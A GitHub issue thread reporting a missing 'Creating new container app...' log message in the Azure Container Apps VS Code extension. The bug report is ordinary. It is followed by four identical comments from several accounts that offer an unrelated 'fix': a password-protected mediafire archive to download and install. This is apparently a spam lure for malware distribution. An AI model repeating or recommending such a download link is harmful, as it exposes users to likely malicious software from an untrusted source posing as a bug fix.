### ISSUE TITLE
There is no log "Creating new container app..." in output window when creating a container app

### ISSUE THREAD

**Issue by v-ruizh** [microsoft/vscode-azurecontainerapps#731]
**OS:** All
**Build Version:** v0.7.1-alpha.0
**Regression:** Not a Regression

**Repro Steps:**
1. F1 -> Azure Container Apps: Create Container App... -> Select one container apps environment -> Enter a container app name -> Select "Quickstart" to create a container app.
2. Navigate to the "Azure Container Apps" output window.
3. Check whether there is a log "Creating new container app..." or not.

**Expect:**
There is a log "Creating new container app..." in output window when creating a container app.
![image](https://github.com/user-attachments/assets/6a5f8e39-6313-4424-a2c7-ad989d148627)

**Actual:**
There is no log "Creating new container app..." in output window when creating a container app, and there are two "created" logs in output window.
![image](https://github.com/user-attachments/assets/05e042a1-bbc0-488f-84a2-210950194045)

**Suggestion:**
Change the first log "Created container app..." to "Creating new container app...".

**More Info:**
This issue also reproduces on the current released extension v0.7.0.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
